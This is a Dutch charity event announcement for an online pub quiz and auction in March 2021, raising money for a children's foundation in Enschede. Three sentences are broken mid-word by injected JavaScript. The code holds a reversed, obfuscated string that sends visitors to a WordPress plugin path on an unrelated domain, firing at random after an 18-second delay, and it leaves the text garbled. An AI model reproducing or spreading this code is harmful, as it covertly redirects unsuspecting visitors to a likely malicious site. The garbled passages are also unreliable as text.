Online pubquiz en veiling 2021

SAVE THE DATE – Donderdag 25 maart!

De Benefietcommissie van 2020 is inmiddels alweer bezig met de laatste activiteit! Dit jaar halen wij geld op voor Stichting Leergeld Enschede. Een stichting die zich inzet voor kinderen van 4 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot 18 jaar van gezinnen met beperkte (financiële) middelen om mee te doen aan onderwijs, cultuur, sport of welzijn.

Helaas zal het spetterende Benefietdiner met gala dit jaar niet doorgaan. Maar wij hebben het gala wel in een nieuw jasje gestoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}token. Namelijk een online pubquiz met een heerlijk borrelpakket om thuis van te genieten. De pubquiz zal plaatsvinden op donderdag 25 maart vanaf 20.00u. Je doet al mee voor 15 euro waarvan een deel naar het goede doel zal gaan! Het thema van deze pubquiz is: kinderhelden! Dus verkleed je als je favoriete superheld om de avond een feestelijk tintje te geven!

Je kunt je vanaf 1 maart per team aanmelden via onze email: mstbenefietdiner@gmail.com. Graag aangeven met hoeveel personen je wilt meedoen (maximaal 5 personen).

Daarnaast openen we op 1 maart een online veiling met prachtige items waarop geboden kan worden toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot en met de avond van de online pubquiz. Check onze website vanaf 1 maart voor deze items: https://www.benefietdiner.com

Tot 25 maart!